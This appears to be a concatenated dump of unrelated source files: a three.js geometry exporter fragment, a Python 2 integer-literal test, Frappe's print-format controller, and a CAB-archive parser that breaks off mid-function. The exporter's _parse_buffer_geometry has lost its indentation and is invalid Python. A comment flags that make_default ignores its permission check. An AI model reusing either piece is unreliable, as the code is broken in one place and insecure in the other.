                  constants.UVS, constants.COLORS,
                  constants.NORMALS, constants.BONES,
                  constants.SKIN_WEIGHTS,
                  constants.SKIN_INDICES, constants.NAME,
                  constants.INFLUENCES_PER_VERTEX]

    data = {}
    anim_components = [constants.MORPH_TARGETS, constants.ANIMATION]
    if self.options.get(constants.EMBED_ANIMATION):
        # embed the animation payload alongside the other components
        components.extend(anim_components)
    else:
        # otherwise reference the external animation file by name
        for component in anim_components:
            try:
                self[component]
            except KeyError:
                pass
            else:
                data[component] = os.path.basename(
                    self.animation_filename)
                break
        else:
            logger.info("No animation data found for %s", self.node)

    for component in components:
        try:
            data[component] = self[component]
        except KeyError:
            logger.debug("Component %s not found", component)

    return data
def _geometry_format(self):
    """Three.Geometry formatted definitions

    :rtype: dict
    """
    data = self._component_data()

    # BufferGeometry wraps its components under an ATTRIBUTES key
    if self[constants.TYPE] != constants.GEOMETRY.title():
        data = {constants.ATTRIBUTES: data}

    data[constants.METADATA] = {
        constants.TYPE: self[constants.TYPE]
    }

    data[constants.METADATA].update(self.metadata)

    return data
def _buffer_geometry_metadata(self, metadata):
    """Record per-attribute item counts for Three.BufferGeometry.

    :param metadata: dict updated in place
    """
    for key, value in self[constants.ATTRIBUTES].items():
        size = value[constants.ITEM_SIZE]
        array = value[constants.ARRAY]
        # BUGFIX: use integer division -- the item count is a whole
        # number, and under Python 3 `/` stored a float in the metadata
        # (the Geometry path already uses int(); see _geometry_metadata)
        metadata[key] = len(array) // size
def _geometry_metadata(self, metadata):
    """Three.Geometry metadat

    :param metadata: dict updated in place with component counts
    :rtype: dict
    """
    # keys whose raw lengths are not meaningful counts
    skip = (constants.TYPE, constants.FACES, constants.UUID,
            constants.ANIMATION, constants.SKIN_INDICES,
            constants.SKIN_WEIGHTS, constants.NAME,
            constants.INFLUENCES_PER_VERTEX)
    vectors = (constants.VERTICES, constants.NORMALS)

    for key in self.keys():
        if key in vectors:
            # vertices/normals are flat arrays: three floats per vector
            try:
                metadata[key] = int(len(self[key])/3)
            except KeyError:
                pass
            continue

        if key in skip:
            continue

        metadata[key] = len(self[key])

    # face records are variable-length, so count via the bitmask parser
    faces = self.face_count
    if faces > 0:
        metadata[constants.FACES] = faces
def _scene_format(self):
    """Format the output for Scene compatability

    :rtype: dict
    """
    data = {
        constants.UUID: self[constants.UUID],
        constants.TYPE: self[constants.TYPE]
    }

    component_data = self._component_data()
    if self[constants.TYPE] == constants.GEOMETRY.title():
        data[constants.DATA] = component_data
        data[constants.DATA].update({
            constants.METADATA: self.metadata
        })
    else:
        # BufferGeometry: attributes are either embedded under DATA or
        # hoisted to the top level, depending on the export options
        if self.options.get(constants.EMBED_GEOMETRY, True):
            data[constants.DATA] = {
                constants.ATTRIBUTES: component_data
            }
        else:
            data[constants.ATTRIBUTES] = component_data
        data[constants.METADATA] = self.metadata
        data[constants.NAME] = self[constants.NAME]

    return data
def _parse_buffer_geometry(self):
"""Parse the geometry to Three.BufferGeometry specs"""
self[constants.ATTRIBUTES] = {}
options_vertices = self.options.get(constants.VERTICES)
option_normals = self.options.get(constants.NORMALS)
option_uvs = self.options.get(constants.UVS)
pos_tuple = (constants.POSITION, options_vertices,
api.mesh.buffer_position, 3)
uvs_tuple = (constants.UV, option_uvs,
api.mesh.buffer_uv, 2)
normals_tuple = (constants.NORMAL, option_normals,
api.mesh.buffer_normal, 3)
dispatch = (pos_tuple, uvs_tuple, normals_tuple)
for key, option, func, size in dispatch:
if not option:
continue
array = func(self.node) or []
if not array:
logger.warning("No array could be made for %s", key)
continue
self[constants.ATTRIBUTES][key] = {
constants.ITEM_SIZE: size,
constants.TYPE: constants.FLOAT_32,
constants.ARRAY: array
}
    def _parse_geometry(self):
        """Parse the geometry to Three.Geometry specs.

        Each component (vertices, normals, colors, materials, uvs,
        faces, animation, bones, skinning, morph targets) is extracted
        only when enabled in self.options; missing data falls back to
        an empty list.
        """
        if self.options.get(constants.VERTICES):
            logger.info("Parsing %s", constants.VERTICES)
            self[constants.VERTICES] = api.mesh.vertices(self.node) or []
        if self.options.get(constants.NORMALS):
            logger.info("Parsing %s", constants.NORMALS)
            self[constants.NORMALS] = api.mesh.normals(self.node) or []
        if self.options.get(constants.COLORS):
            logger.info("Parsing %s", constants.COLORS)
            self[constants.COLORS] = api.mesh.vertex_colors(
                self.node) or []
        if self.options.get(constants.FACE_MATERIALS):
            logger.info("Parsing %s", constants.FACE_MATERIALS)
            self[constants.MATERIALS] = api.mesh.materials(
                self.node, self.options) or []
        if self.options.get(constants.UVS):
            logger.info("Parsing %s", constants.UVS)
            self[constants.UVS] = api.mesh.uvs(self.node) or []
        if self.options.get(constants.FACES):
            logger.info("Parsing %s", constants.FACES)
            self[constants.FACES] = api.mesh.faces(
                self.node, self.options) or []
        # animation option is tri-state; anything not in no_anim enables it
        no_anim = (None, False, constants.OFF)
        if self.options.get(constants.ANIMATION) not in no_anim:
            logger.info("Parsing %s", constants.ANIMATION)
            self[constants.ANIMATION] = api.mesh.skeletal_animation(
                self.node, self.options) or []
        #@TODO: considering making bones data implied when
        #       querying skinning data
        # bone_map must be built before skinning below, which consumes it;
        # without the BONES option it stays empty
        bone_map = {}
        if self.options.get(constants.BONES):
            logger.info("Parsing %s", constants.BONES)
            bones, bone_map = api.mesh.bones(self.node, self.options)
            self[constants.BONES] = bones
        if self.options.get(constants.SKINNING):
            logger.info("Parsing %s", constants.SKINNING)
            influences = self.options.get(
                constants.INFLUENCES_PER_VERTEX, 2)
            self[constants.INFLUENCES_PER_VERTEX] = influences
            self[constants.SKIN_INDICES] = api.mesh.skin_indices(
                self.node, bone_map, influences) or []
            self[constants.SKIN_WEIGHTS] = api.mesh.skin_weights(
                self.node, bone_map, influences) or []
        if self.options.get(constants.MORPH_TARGETS):
            logger.info("Parsing %s", constants.MORPH_TARGETS)
            self[constants.MORPH_TARGETS] = api.mesh.morph_targets(
                self.node, self.options) or []
|
sauloal/pycluster | refs/heads/master | pypy-1.9_64/lib-python/2.7/test/test_int_literal.py | 139 | """Test correct treatment of hex/oct constants.
This is complex because of changes due to PEP 237.
"""
import unittest
from test import test_support
class TestHexOctBin(unittest.TestCase):
    """Python 2 literal-parsing tests for hex, octal and binary constants.

    The exact literals (old-style 0NNN octal, L suffixes, 0x/0o/0b forms)
    ARE the payload being tested — they must not be rewritten.
    """
    def test_hex_baseline(self):
        """Hex literals up to the signed 64-bit boundary parse as ints."""
        # A few upper/lowercase tests
        self.assertEqual(0x0, 0X0)
        self.assertEqual(0x1, 0X1)
        self.assertEqual(0x123456789abcdef, 0X123456789abcdef)
        # Baseline tests
        self.assertEqual(0x0, 0)
        self.assertEqual(0x10, 16)
        self.assertEqual(0x7fffffff, 2147483647)
        self.assertEqual(0x7fffffffffffffff, 9223372036854775807)
        # Ditto with a minus sign and parentheses
        self.assertEqual(-(0x0), 0)
        self.assertEqual(-(0x10), -16)
        self.assertEqual(-(0x7fffffff), -2147483647)
        self.assertEqual(-(0x7fffffffffffffff), -9223372036854775807)
        # Ditto with a minus sign and NO parentheses
        self.assertEqual(-0x0, 0)
        self.assertEqual(-0x10, -16)
        self.assertEqual(-0x7fffffff, -2147483647)
        self.assertEqual(-0x7fffffffffffffff, -9223372036854775807)
    def test_hex_unsigned(self):
        """Hex literals past the signed boundary promote to long (PEP 237)."""
        # Positive constants
        self.assertEqual(0x80000000, 2147483648L)
        self.assertEqual(0xffffffff, 4294967295L)
        # Ditto with a minus sign and parentheses
        self.assertEqual(-(0x80000000), -2147483648L)
        self.assertEqual(-(0xffffffff), -4294967295L)
        # Ditto with a minus sign and NO parentheses
        # This failed in Python 2.2 through 2.2.2 and in 2.3a1
        self.assertEqual(-0x80000000, -2147483648L)
        self.assertEqual(-0xffffffff, -4294967295L)
        # Positive constants
        self.assertEqual(0x8000000000000000, 9223372036854775808L)
        self.assertEqual(0xffffffffffffffff, 18446744073709551615L)
        # Ditto with a minus sign and parentheses
        self.assertEqual(-(0x8000000000000000), -9223372036854775808L)
        self.assertEqual(-(0xffffffffffffffff), -18446744073709551615L)
        # Ditto with a minus sign and NO parentheses
        # This failed in Python 2.2 through 2.2.2 and in 2.3a1
        self.assertEqual(-0x8000000000000000, -9223372036854775808L)
        self.assertEqual(-0xffffffffffffffff, -18446744073709551615L)
    def test_oct_baseline(self):
        """Old-style 0NNN octal literals within the signed range."""
        # Baseline tests
        self.assertEqual(00, 0)
        self.assertEqual(020, 16)
        self.assertEqual(017777777777, 2147483647)
        self.assertEqual(0777777777777777777777, 9223372036854775807)
        # Ditto with a minus sign and parentheses
        self.assertEqual(-(00), 0)
        self.assertEqual(-(020), -16)
        self.assertEqual(-(017777777777), -2147483647)
        self.assertEqual(-(0777777777777777777777), -9223372036854775807)
        # Ditto with a minus sign and NO parentheses
        self.assertEqual(-00, 0)
        self.assertEqual(-020, -16)
        self.assertEqual(-017777777777, -2147483647)
        self.assertEqual(-0777777777777777777777, -9223372036854775807)
    def test_oct_baseline_new(self):
        """New-style 0o octal literals (PEP 3127) within the signed range."""
        # A few upper/lowercase tests
        self.assertEqual(0o0, 0O0)
        self.assertEqual(0o1, 0O1)
        self.assertEqual(0o1234567, 0O1234567)
        # Baseline tests
        self.assertEqual(0o0, 0)
        self.assertEqual(0o20, 16)
        self.assertEqual(0o17777777777, 2147483647)
        self.assertEqual(0o777777777777777777777, 9223372036854775807)
        # Ditto with a minus sign and parentheses
        self.assertEqual(-(0o0), 0)
        self.assertEqual(-(0o20), -16)
        self.assertEqual(-(0o17777777777), -2147483647)
        self.assertEqual(-(0o777777777777777777777), -9223372036854775807)
        # Ditto with a minus sign and NO parentheses
        self.assertEqual(-0o0, 0)
        self.assertEqual(-0o20, -16)
        self.assertEqual(-0o17777777777, -2147483647)
        self.assertEqual(-0o777777777777777777777, -9223372036854775807)
    def test_oct_unsigned(self):
        """Old-style octal literals past the signed boundary."""
        # Positive constants
        self.assertEqual(020000000000, 2147483648L)
        self.assertEqual(037777777777, 4294967295L)
        # Ditto with a minus sign and parentheses
        self.assertEqual(-(020000000000), -2147483648L)
        self.assertEqual(-(037777777777), -4294967295L)
        # Ditto with a minus sign and NO parentheses
        # This failed in Python 2.2 through 2.2.2 and in 2.3a1
        self.assertEqual(-020000000000, -2147483648L)
        self.assertEqual(-037777777777, -4294967295L)
        # Positive constants
        self.assertEqual(01000000000000000000000, 9223372036854775808L)
        self.assertEqual(01777777777777777777777, 18446744073709551615L)
        # Ditto with a minus sign and parentheses
        self.assertEqual(-(01000000000000000000000), -9223372036854775808L)
        self.assertEqual(-(01777777777777777777777), -18446744073709551615L)
        # Ditto with a minus sign and NO parentheses
        # This failed in Python 2.2 through 2.2.2 and in 2.3a1
        self.assertEqual(-01000000000000000000000, -9223372036854775808L)
        self.assertEqual(-01777777777777777777777, -18446744073709551615L)
    def test_oct_unsigned_new(self):
        """New-style 0o octal literals past the signed boundary."""
        # Positive constants
        self.assertEqual(0o20000000000, 2147483648L)
        self.assertEqual(0o37777777777, 4294967295L)
        # Ditto with a minus sign and parentheses
        self.assertEqual(-(0o20000000000), -2147483648L)
        self.assertEqual(-(0o37777777777), -4294967295L)
        # Ditto with a minus sign and NO parentheses
        # This failed in Python 2.2 through 2.2.2 and in 2.3a1
        self.assertEqual(-0o20000000000, -2147483648L)
        self.assertEqual(-0o37777777777, -4294967295L)
        # Positive constants
        self.assertEqual(0o1000000000000000000000, 9223372036854775808L)
        self.assertEqual(0o1777777777777777777777, 18446744073709551615L)
        # Ditto with a minus sign and parentheses
        self.assertEqual(-(0o1000000000000000000000), -9223372036854775808L)
        self.assertEqual(-(0o1777777777777777777777), -18446744073709551615L)
        # Ditto with a minus sign and NO parentheses
        # This failed in Python 2.2 through 2.2.2 and in 2.3a1
        self.assertEqual(-0o1000000000000000000000, -9223372036854775808L)
        self.assertEqual(-0o1777777777777777777777, -18446744073709551615L)
    def test_bin_baseline(self):
        """Binary 0b literals within the signed range."""
        # A few upper/lowercase tests
        self.assertEqual(0b0, 0B0)
        self.assertEqual(0b1, 0B1)
        self.assertEqual(0b10101010101, 0B10101010101)
        # Baseline tests
        self.assertEqual(0b0, 0)
        self.assertEqual(0b10000, 16)
        self.assertEqual(0b1111111111111111111111111111111, 2147483647)
        self.assertEqual(0b111111111111111111111111111111111111111111111111111111111111111, 9223372036854775807)
        # Ditto with a minus sign and parentheses
        self.assertEqual(-(0b0), 0)
        self.assertEqual(-(0b10000), -16)
        self.assertEqual(-(0b1111111111111111111111111111111), -2147483647)
        self.assertEqual(-(0b111111111111111111111111111111111111111111111111111111111111111), -9223372036854775807)
        # Ditto with a minus sign and NO parentheses
        self.assertEqual(-0b0, 0)
        self.assertEqual(-0b10000, -16)
        self.assertEqual(-0b1111111111111111111111111111111, -2147483647)
        self.assertEqual(-0b111111111111111111111111111111111111111111111111111111111111111, -9223372036854775807)
    def test_bin_unsigned(self):
        """Binary literals past the signed boundary."""
        # Positive constants
        self.assertEqual(0b10000000000000000000000000000000, 2147483648L)
        self.assertEqual(0b11111111111111111111111111111111, 4294967295L)
        # Ditto with a minus sign and parentheses
        self.assertEqual(-(0b10000000000000000000000000000000), -2147483648L)
        self.assertEqual(-(0b11111111111111111111111111111111), -4294967295L)
        # Ditto with a minus sign and NO parentheses
        # This failed in Python 2.2 through 2.2.2 and in 2.3a1
        self.assertEqual(-0b10000000000000000000000000000000, -2147483648L)
        self.assertEqual(-0b11111111111111111111111111111111, -4294967295L)
        # Positive constants
        self.assertEqual(0b1000000000000000000000000000000000000000000000000000000000000000, 9223372036854775808L)
        self.assertEqual(0b1111111111111111111111111111111111111111111111111111111111111111, 18446744073709551615L)
        # Ditto with a minus sign and parentheses
        self.assertEqual(-(0b1000000000000000000000000000000000000000000000000000000000000000), -9223372036854775808L)
        self.assertEqual(-(0b1111111111111111111111111111111111111111111111111111111111111111), -18446744073709551615L)
        # Ditto with a minus sign and NO parentheses
        # This failed in Python 2.2 through 2.2.2 and in 2.3a1
        self.assertEqual(-0b1000000000000000000000000000000000000000000000000000000000000000, -9223372036854775808L)
        self.assertEqual(-0b1111111111111111111111111111111111111111111111111111111111111111, -18446744073709551615L)
def test_main():
    """Entry point used by the regrtest/test_support framework."""
    test_support.run_unittest(TestHexOctBin)
if __name__ == "__main__":
    # allow running this test file directly, outside of regrtest
    test_main()
|
yashodhank/frappe | refs/heads/develop | frappe/print/doctype/print_format/print_format.py | 9 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
import frappe.utils
import json
from frappe.utils.jinja import validate_template
from frappe.model.document import Document
class PrintFormat(Document):
	"""Controller for the Print Format doctype (frappe Document hooks)."""
	def validate(self):
		"""Block edits to standard formats outside developer mode,
		remember the previous doc_type for cache clearing, extract
		embedded images and validate the Jinja template."""
		if (self.standard=="Yes"
			and not frappe.local.conf.get("developer_mode")
			and not (frappe.flags.in_import or frappe.flags.in_test)):
			frappe.throw(frappe._("Standard Print Format cannot be updated"))
		# old_doc_type is required for clearing item cache
		self.old_doc_type = frappe.db.get_value('Print Format',
			self.name, 'doc_type')
		self.extract_images()
		if self.html:
			validate_template(self.html)
	def extract_images(self):
		"""Move inline base64 images in HTML fields out to File records,
		rewriting format_data to reference the extracted files."""
		from frappe.utils.file_manager import extract_images_from_html
		if self.format_data:
			data = json.loads(self.format_data)
			for df in data:
				if df.get('fieldtype') and df['fieldtype'] in ('HTML', 'Custom HTML') and df.get('options'):
					df['options'] = extract_images_from_html(self, df['options'])
			self.format_data = json.dumps(data)
	def on_update(self):
		"""Clear caches for both the old and current doc_type, then
		export the record to disk when it is a standard format."""
		if hasattr(self, 'old_doc_type') and self.old_doc_type:
			frappe.clear_cache(doctype=self.old_doc_type)
		if self.doc_type:
			frappe.clear_cache(doctype=self.doc_type)
		self.export_doc()
	def export_doc(self):
		# export standard print formats to the module's files
		# (only meaningful in developer mode)
		if self.standard == 'Yes' and (frappe.conf.get('developer_mode') or 0) == 1:
			module = frappe.db.get_value("DocType", self.doc_type, "module")
			from frappe.modules.export_file import export_to_files
			export_to_files(record_list=[['Print Format', self.name]],
				record_module= module)
	def on_trash(self):
		"""Invalidate the doctype cache when this format is deleted."""
		if self.doc_type:
			frappe.clear_cache(doctype=self.doc_type)
@frappe.whitelist()
def make_default(name):
	"""Set print format as default.

	In developer mode the default is written onto the DocType itself;
	otherwise a Property Setter customization is created.
	"""
	# NOTE(review): frappe.has_permission returns a bool which is ignored
	# here, so this call does not actually enforce write permission;
	# it should probably pass throw=True or check the result — confirm.
	frappe.has_permission("Print Format", "write")
	print_format = frappe.get_doc("Print Format", name)
	if (frappe.conf.get('developer_mode') or 0) == 1:
		# developer mode, set it default in doctype
		doctype = frappe.get_doc("DocType", print_format.doc_type)
		doctype.default_print_format = name
		doctype.save()
	else:
		# customization
		frappe.make_property_setter({
			'doctype_or_field': "DocType",
			'doctype': print_format.doc_type,
			'property': "default_print_format",
			'value': name,
		})
	frappe.msgprint(frappe._("Done"))
|
StefaFaerb1/Stefanie | refs/heads/master | py/openage/convert/cabextract/cab.py | 46 | import os
from struct import Struct
from bisect import bisect
from . import lzxd
class Error(Exception):
    """Base class for all CAB-parsing errors raised by this module."""
class Namespace:
    """Attribute-access bag of values, similar to types.SimpleNamespace.

    Values can be read and written both as attributes and via []
    indexing; keys must not start with an underscore. Construction
    accepts any mix of mappings (dicts, or arbitrary objects whose
    vars() are used) and keyword arguments.
    """

    def __init__(self, *mappings, **kwargs):
        self._update(*mappings, **kwargs)

    def _update(self, *mappings, **kwargs):
        """Merge every given mapping/object and all kwargs into self."""
        for mapping in mappings:
            # generalized: accept dict subclasses directly instead of
            # failing inside vars() (previously only exact dict was used)
            if not isinstance(mapping, dict):
                mapping = vars(mapping)
            self._update(**mapping)
        for k, v in kwargs.items():
            self[k] = v

    def __getitem__(self, k):
        if k[0] == '_':
            raise Exception("key mustn't start with _")
        return getattr(self, k)

    def __setitem__(self, k, v):
        if k[0] == '_':
            raise Exception("key mustn't start with _")
        setattr(self, k, v)

    def __str__(self):
        result = []
        items = sorted(vars(self).items())
        # robustness fix: max() over an empty sequence raised ValueError
        # for an empty Namespace; default=0 makes str() return "".
        klen = max((len(k) for k, v in items), default=0)
        for k, v in items:
            result.append(k.ljust(klen) + " = " + str(v))
        return '\n'.join(result)

    def __repr__(self):
        return repr(vars(self))
class ByteQueue:
    """FIFO byte buffer: fed in chunks, drained in arbitrary sizes.

    self.pos tracks the total number of bytes ever consumed; self.size
    is the number of bytes currently stored.
    """

    def __init__(self):
        from collections import deque
        self.bufs = deque()   # pending, not-yet-consumed chunks
        self.size = 0
        self.pos = 0

    def __len__(self):
        return self.size

    def append(self, buf):
        """Enqueue one bytes chunk."""
        self.bufs.append(buf)
        self.size += len(buf)

    def popleft(self, size):
        """Dequeue exactly `size` bytes and return them as one object."""
        if size > self.size:
            raise Exception("queue does not contain enough bytes")
        self.size -= size
        self.pos += size

        taken = []
        need = size
        while need > 0:
            chunk = self.bufs.popleft()
            if len(chunk) > need:
                # split this chunk; push the unused tail back on the left
                self.bufs.appendleft(chunk[need:])
                chunk = chunk[:need]
            taken.append(chunk)
            need -= len(chunk)
        return b"".join(taken)
class IterCache:
    """Wraps an iterator, exposing the most recent value as .current.

    The first value is fetched eagerly on construction; next() advances
    the iterator and overwrites .current. StopIteration propagates.
    """
    def __init__(self, iterator):
        self.iterator = iterator
        self.next()

    def next(self):
        # advance the underlying iterator and cache the new value
        self.current = next(self.iterator)
def read_bytes(f, count):
    """Read exactly `count` bytes from f; raise Error on a short read."""
    data = f.read(count)
    if len(data) == count:
        return data
    raise Error("Unexpected EOF")
def read_at(f, pos, count):
    """Read `count` bytes at absolute offset `pos`, restoring f's
    position afterwards."""
    saved = f.tell()
    f.seek(pos)
    data = read_bytes(f, count)
    f.seek(saved)
    return data
def read_string(f, maxlen=255):
    """Read a NUL-terminated byte string of at most `maxlen` bytes.

    The terminating NUL is consumed but not returned; Error is raised
    if no terminator appears within maxlen bytes.
    """
    buf = bytearray()
    while True:
        ch = read_bytes(f, 1)
        if ch == b"\0":
            return bytes(buf)
        buf += ch
        if len(buf) > maxlen:
            raise Error("expected \\0; string too long")
def try_decode(s):
    """Decode bytes as UTF-8, falling back to ISO-8859-1.

    The latin-1 fallback can decode any byte sequence, so this never
    raises for bytes input.
    """
    try:
        return s.decode('utf-8')
    except UnicodeDecodeError:
        # bugfix: was a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit and unrelated programming errors
        return s.decode('iso-8859-1')
class NamedMemberStruct:
    """A struct.Struct whose unpacked values carry member names.

    Members are given as (format-char, name) pairs. "x" entries are
    padding: they contribute to the binary layout but get no name.
    """

    def __init__(self, endianness, *members):
        spec = [endianness]
        self.members = []
        self.membertypes = []
        for membertype, membername in members:
            spec.append(membertype)
            if membertype == "x":
                # padding byte: part of the layout, but unnamed
                continue
            self.members.append(membername)
            self.membertypes.append(membertype)
        self.struct = Struct("".join(spec))

    def read(self, f):
        """Read and unpack one record from f into a Namespace."""
        raw = self.struct.unpack(read_bytes(f, self.struct.size))
        return Namespace(dict(zip(self.members, raw)))

    def default(self):
        """Return a Namespace with zero-ish defaults for every member."""
        result = Namespace()
        for membertype, name in zip(self.membertypes, self.members):
            if membertype in "?":
                result[name] = False
            elif membertype in "cbBhHiIlLfdnNPqQ":
                result[name] = 0
            elif membertype[-1] in "sp":
                result[name] = b""
            else:
                raise Error("Unknown default for type " + membertype)
        return result
class FlagDecoder:
    """Decodes an integer bitfield into named boolean flags.

    Flags are given as (bit position, name) pairs; decode() maps an
    integer to a Namespace of booleans and rejects undefined bits.
    """

    def __init__(self, *flags):
        self.flags = []
        for bitpos, name in flags:
            self.flags.append(((1 << bitpos), name))

    def decode(self, val):
        """Return a Namespace with one bool per flag; raise Error if
        val contains bits outside the declared flags."""
        result = Namespace()
        for flagweight, flagname in self.flags:
            if val & flagweight:
                hasflag = True
                # clear the bit so leftovers can be detected below
                val ^= flagweight
            else:
                hasflag = False
            result[flagname] = hasflag
        if val:
            # bugfix: this raised NameError (str(flag) referenced an
            # undefined name); report the leftover bits instead
            raise Error("Undefined flag values: " + str(val))
        return result

    def default(self):
        """Return a Namespace with every flag set to False."""
        return Namespace({name: False for _, name in self.flags})
# Binary layout of the cabinet structures, per the Microsoft Cabinet
# (.cab) file format specification: CFHEADER, CFFOLDER, CFFILE, CFDATA.
cfheaderflags_decoder = FlagDecoder(
    (0, "prev_cabinet"),    # this cabfile is not the first of the set.
                            # szCabinetPrev and szDiskPrev are present
                            # after the header.
    (1, "next_cabinet"),    # this cabfile is not the last of the set.
                            # szCabinetNext and szDiskNext are present
                            # after the header.
    (2, "reserve_present")  # this cabinet file has reserved fields.
                            # cbCFHeader, cbCFFolder, and cbCFData
                            # are present after the header, followed by
                            # cbCFHeader bytes of data.
)

cfheader_struct = NamedMemberStruct("<",
    ("4s", "signature"),    # magic number: MSCF
    ("I", "reserved1"),     #
    ("I", "cbCabinet"),     # size of this cabinet file in bytes
    ("I", "reserved2"),     #
    ("I", "coffFiles"),     # absolute offset of the first CFFILE entry
    ("I", "reserved3"),     #
    ("B", "versionMinor"),  # cab file format version (minor)
    ("B", "versionMajor"),  # cab file format version (major)
    ("H", "cFolders"),      # number of CFFOLDER entries in this cabinet
    ("H", "cFiles"),        # number of CFFILES entries in this cabinet
    ("H", "flags"),         # see cfheaderflags_decoder
    ("H", "setID"),         # must be same in all cabinets of a set
    ("H", "iCabinet"),      # number of this cabinet file in the set
)

# only present when the reserve_present header flag is set
cfheader_reservedfields_struct = NamedMemberStruct("<",
    ("H", "cbCFHeader"),    # size of per-cabinet reserved area
    ("B", "cbCFFolder"),    # size of per-folder reserved area
    ("B", "cbCFData"),      # size of per-datablock reserved area
)

cffolder_struct = NamedMemberStruct("<",
    ("I", "coffCabStart"),  # absolute file offset of first CFDATA block
    ("H", "cCFData"),       # number of CFDATA blocks
    ("H", "typeCompress"),  # compression type. only the 4 last significant
                            # bits seem to be relevant.
)

cffileattribsflag_decoder = FlagDecoder(
    (0, "rdonly"),          # readonly
    (1, "hidden"),          # hidden
    (2, "system"),          # system file
    (5, "arch"),            # archive flag: modified since last backup
    (6, "exec"),            # run after extraction
    (7, "name_is_utf"),     # name is UTF-8, not "current locale" (8859-1)
)

cffile_struct = NamedMemberStruct("<",
    ("I", "cbFile"),           # uncompressed filesize
    ("I", "uoffFolderStart"),  # uncompressed offset of file in folder
    ("H", "iFolder"),          # index of the folder that contains this file.
                               # there are several special indices:
                               # 0xFFFD continued_from_prev: 0
                               # 0xFFFE continued_to_next: -1
                               # 0xFFFF continued_prev_and_next: 0
    ("H", "date"),             # DOS date: ((year - 1980) << 9) + (month << 5) + day
    ("H", "time"),             # DOS time: (hour << 11) + (minute << 5) + (seconds >> 1)
    ("H", "attribs"),          # see cffileattribsflag_decoder
)

cfdata_struct = NamedMemberStruct("<",
    ("I", "csum"),      # checksum of cbData through ab
    ("H", "cbData"),    # number of compressed bytes
    ("H", "cbUncomp"),  # number of uncompressed bytes
    # the struct is followed in the file by:
    # abReserve[header.cbCFData],
    # ab[cbData]
)
class CABFile:
    """Parser for a Microsoft Cabinet (.cab) archive.

    The CFHEADER/CFFOLDER/CFFILE/CFDATA structures are indexed on
    construction; the compressed folder payloads are decompressed
    lazily via readfiledata() (or eagerly with readfiledata=True).
    """

    def __init__(self, filename, readfiledata=False):
        """Open and index the cab file.

        filename     -- path of the .cab file
        readfiledata -- if True, decompress all folder data immediately
        """
        f = open(filename, 'rb')

        # read the fixed-size cabinet header
        header = cfheader_struct.read(f)
        if header.signature != b"MSCF":
            raise Error("invalid CAB file signature")

        # decode flags
        header._update(cfheaderflags_decoder.decode(header.flags))

        # read reserve header (optional)
        if header.reserve_present:
            header._update(cfheader_reservedfields_struct.read(f))
        else:
            header._update(cfheader_reservedfields_struct.default())

        # read the per-cabinet reserved area
        header.abReserve = read_bytes(f, header.cbCFHeader)

        # read previous cabinet info
        if header.prev_cabinet:
            header.szCabinetPrev = try_decode(read_string(f))
            header.szDiskPrev = try_decode(read_string(f))
        else:
            header.szCabinetPrev = None
            header.szDiskPrev = None

        # read next cabinet info
        if header.next_cabinet:
            header.szCabinetNext = try_decode(read_string(f))
            header.szDiskNext = try_decode(read_string(f))
        else:
            header.szCabinetNext = None
            header.szDiskNext = None

        folders = []

        # read folder headers
        for i in range(header.cFolders):
            folder = cffolder_struct.read(f)

            # read the per-folder reserved area
            folder.abReserve = read_bytes(f, header.cbCFFolder)

            folder.comptype_masked = folder.typeCompress & 0x000f
            folder.comp_window_size = (folder.typeCompress >> 8) & 0x1f

            # only LZX compression is implemented
            if folder.comptype_masked == 0:
                folder.comptype = "plain"
                raise Error("plain compression is unsupported (uhm, yes.)")
            elif folder.comptype_masked == 1:
                folder.comptype = "MSZIP"
                raise Error("MSZIP compression is unsupported")
            elif folder.comptype_masked == 2:
                folder.comptype = "QUANTUM"
                raise Error("Quantum compression is unsupported")
            elif folder.comptype_masked == 3:
                folder.comptype = "LZX"
            else:
                raise Error("Unknown compression type: " +
                            str(folder.comptype_masked))

            folder.index = i
            folders.append(folder)

        # read file headers
        if f.tell() != header.coffFiles:
            f.seek(header.coffFiles)
            print("cabfile has nonstandard format: seek to header.coffFiles " +
                  "was required")

        files = {}
        files_lowercase = {}
        for _ in range(header.cFiles):
            file_ = cffile_struct.read(f)

            # decode flags
            file_._update(cffileattribsflag_decoder.decode(file_.attribs))

            # read filename
            file_.name = read_string(f)

            # decode filename according to flags
            if file_.name_is_utf:
                file_.name = file_.name.decode('utf-8')
            else:
                file_.name = file_.name.decode('iso-8859-1')

            # translate the special iFolder markers for split files
            file_.continued_from_prev = False
            file_.continued_to_next = False
            if file_.iFolder == 0xFFFD:
                file_.iFolder = 0
                file_.continued_from_prev = True
            elif file_.iFolder == 0xFFFE:
                file_.iFolder = len(folders) - 1
                file_.continued_to_next = True
            elif file_.iFolder == 0xFFFF:
                file_.iFolder = 0
                file_.continued_from_prev = True
                file_.continued_to_next = True

            # unpack the DOS-style date/time stamps
            year = (file_.date >> 9) + 1980
            month = (file_.date >> 5) & 0x000f
            day = (file_.date >> 0) & 0x001f
            hour = (file_.time >> 11)
            minute = (file_.time >> 5) & 0x003f
            sec = (file_.time << 1) & 0x003f

            import datetime
            dt = datetime.datetime(year, month, day, hour, minute, sec)
            import calendar
            file_.timestamp = calendar.timegm(dt.utctimetuple())
            # no timezone info is available; assume UTC.

            # cosmetic changes
            file_.folderid = file_.iFolder
            file_.name = file_.name.replace('\\', '/')
            file_.size = file_.cbFile
            file_.pos = file_.uoffFolderStart

            # insert file into dicts
            if file_.name in files:
                raise Exception("multiple files with name %s" % file_.name)
            files[file_.name] = file_

            lowername = file_.name.lower()
            if lowername in files_lowercase:
                raise Exception("multiple files with lower-case name %s"
                                % lowername)
            files_lowercase[lowername] = file_

        # read data block metainfo (payload bytes are skipped, not read)
        for folder in folders:
            folder.datablocks = []
            if f.tell() != folder.coffCabStart:
                # bugfix: the two message fragments used to concatenate
                # without a separating space ("data blockof folder")
                print("cabfile has strange format: seek to first data block " +
                      "of folder " + str(folder.index) + " is required.")
                f.seek(folder.coffCabStart)

            folder.uncompressed_size = 0
            for _ in range(folder.cCFData):
                datablock = cfdata_struct.read(f)
                datablock.abReserve = read_bytes(f, header.cbCFData)
                datablock.ab_start = f.tell()
                datablock.ab_size = datablock.cbData
                f.seek(datablock.ab_size, 1)
                # checksum is unimplemented for now
                folder.datablocks.append(datablock)
                folder.uncompressed_size += datablock.cbUncomp

            folder.pseudofile = FolderPseudoFile(folder, f)

        self.f = f
        self.header = header
        self.folders = folders
        self.files = files
        self.files_lowercase = files_lowercase
        self.filedata_read = False
        if readfiledata:
